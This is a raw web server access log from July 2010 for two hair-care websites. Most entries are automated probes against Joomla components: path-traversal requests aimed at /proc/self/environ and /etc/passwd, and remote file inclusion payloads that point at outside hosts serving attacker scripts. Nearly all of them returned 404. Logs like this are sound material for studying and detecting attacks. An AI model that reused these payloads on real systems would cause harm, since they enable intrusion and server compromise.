75.125.254.98 - - [11/Jul/2010:20:14:23 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:14:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:14:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:14:24 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.127.248.175 - - [11/Jul/2010:20:15:35 -0700] "GET /include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.127.248.175 - - [11/Jul/2010:20:15:35 -0700] "GET /logs//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.127.248.175 - - [11/Jul/2010:20:15:39 -0700] "GET /logs/access.log//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.105.210.162 - - [11/Jul/2010:20:16:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.stopdigitalamnesia.com/" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.freehairsecrets.com"
193.105.210.162 - - [11/Jul/2010:20:16:30 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.freehairsecrets.com"
78.46.50.98 - - [11/Jul/2010:20:18:39 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:18:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:18:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:18:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [11/Jul/2010:20:18:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:19:33 -0700] "GET /include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:19:33 -0700] "GET /logs//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:19:34 -0700] "GET /logs/access_100301.log//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:20:35 -0700] "GET /logs/access_100104.log//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:20:20:56 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:24:00 -0700] "GET /logs//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.127.248.175 - - [11/Jul/2010:20:24:00 -0700] "GET /include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.127.248.175 - - [11/Jul/2010:20:24:00 -0700] "GET /logs/access.log//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.117.234.106 - - [11/Jul/2010:20:24:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
87.117.234.106 - - [11/Jul/2010:20:24:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
87.117.234.106 - - [11/Jul/2010:20:25:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.115.111.248 - - [11/Jul/2010:20:25:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5010 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:25:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5296 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:25:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5370 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
87.117.234.106 - - [11/Jul/2010:20:25:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.115.111.248 - - [11/Jul/2010:20:25:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5468 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:25:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5516 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:25:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5652 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:25:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5685 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:25:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
87.117.234.106 - - [11/Jul/2010:20:25:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:26:01 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6318 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:20:26:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6329 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
174.120.153.34 - - [11/Jul/2010:20:26:53 -0700] "HEAD / HTTP/1.1" 200 0 "http://www.fresharticleshub.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.freehairsecrets.com"
188.127.248.175 - - [11/Jul/2010:20:28:25 -0700] "GET /logs/access_100104.log//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.44.51.133 - - [11/Jul/2010:20:31:59 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.freehairsecrets.com"
72.44.51.133 - - [11/Jul/2010:20:32:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14267#14267 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.freehairsecrets.com"
75.125.254.98 - - [11/Jul/2010:20:32:15 -0700] "GET /logs/access_100419.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [11/Jul/2010:20:32:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [11/Jul/2010:20:32:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [11/Jul/2010:20:32:16 -0700] "GET /logs/access_100419.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [11/Jul/2010:20:32:16 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [11/Jul/2010:20:32:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:20:33:06 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
184.32.221.156 - - [11/Jul/2010:20:39:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.rackupdates.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
184.32.221.156 - - [11/Jul/2010:20:39:21 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
202.12.97.83 - - [11/Jul/2010:20:41:05 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.atmar.com.pl/components/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.12.97.83 - - [11/Jul/2010:20:41:05 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.atmar.com.pl/components/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.12.97.83 - - [11/Jul/2010:20:41:05 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.atmar.com.pl/components/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:20:45:04 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
78.46.50.98 - - [11/Jul/2010:20:53:03 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
78.46.50.98 - - [11/Jul/2010:20:53:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
78.46.50.98 - - [11/Jul/2010:20:53:05 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:20:56:46 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
67.195.37.176 - - [11/Jul/2010:21:05:17 -0700] "GET /logs/access_100621.log HTTP/1.0" 200 4130305 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
81.28.98.69 - - [11/Jul/2010:21:09:40 -0700] "GET /////////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:21:10:06 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
64.120.225.202 - - [11/Jul/2010:21:10:21 -0700] "GET /////////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
67.195.37.176 - - [11/Jul/2010:21:20:19 -0700] "GET /logs/?D=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.183.187.155 - - [11/Jul/2010:21:20:41 -0700] "GET /logs/scripts.log HTTP/1.0" 200 30845 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:21:22:31 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
64.120.225.202 - - [11/Jul/2010:21:27:11 -0700] "GET /logs/access.log//////////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.120.225.202 - - [11/Jul/2010:21:27:11 -0700] "GET /////////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.120.225.202 - - [11/Jul/2010:21:27:11 -0700] "GET /logs//////////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:21:34:37 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
114.38.86.226 - - [11/Jul/2010:21:37:03 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
88.84.128.40 - - [11/Jul/2010:21:43:20 -0700] "GET /?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:43:20 -0700] "GET /logs/access_100531.log%20%20/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:43:20 -0700] "GET /logs/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:43:23 -0700] "GET /logs/access_100607.log%20%20/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:44:20 -0700] "GET /logs/access_100621.log%20%20/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:44:26 -0700] "GET /logs/access_100426.log%20%20/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:44:37 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.84.128.40 - - [11/Jul/2010:21:45:09 -0700] "GET /logs/access_100215.log%20%20/?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:21:47:26 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
75.101.234.2 - - [11/Jul/2010:21:52:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "freehairsecrets.com"
75.101.234.2 - - [11/Jul/2010:21:52:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16498 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:22:00:48 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
125.141.91.138 - - [11/Jul/2010:22:02:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.freehairsecrets.com"
125.141.91.138 - - [11/Jul/2010:22:02:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:22:03:36 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:22:05:21 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:22:05:23 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
88.131.106.4 - - [11/Jul/2010:22:05:31 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.freehairsecrets.com"
88.131.106.3 - - [11/Jul/2010:22:05:37 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:22:11:17 -0700] "GET /logs/access.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:22:11:17 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:22:11:17 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
125.141.91.138 - - [11/Jul/2010:22:12:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:22:13:22 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
114.108.151.149 - - [11/Jul/2010:22:13:59 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [11/Jul/2010:22:17:39 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.117.234.106 - - [11/Jul/2010:22:21:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:22:26:34 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:30:39 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:30:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:30:39 -0700] "GET /logs/access_100628.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:33:13 -0700] "GET /logs/access_100705.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:33:29 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:33:29 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:33:29 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:33:43 -0700] "GET /logs/access_100628.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:34:02 -0700] "GET /logs/access_100705.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:34:02 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:22:35:29 -0700] "GET /index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
187.40.104.103 - - [11/Jul/2010:22:36:00 -0700] "GET /logs/access_100607.log\" HTTP/1.0" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.freehairsecrets.com"
114.108.151.149 - - [11/Jul/2010:22:38:03 -0700] "GET /logs/access.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [11/Jul/2010:22:38:03 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [11/Jul/2010:22:38:04 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:38:22 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:38:22 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:38:22 -0700] "GET /logs/access_100628.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
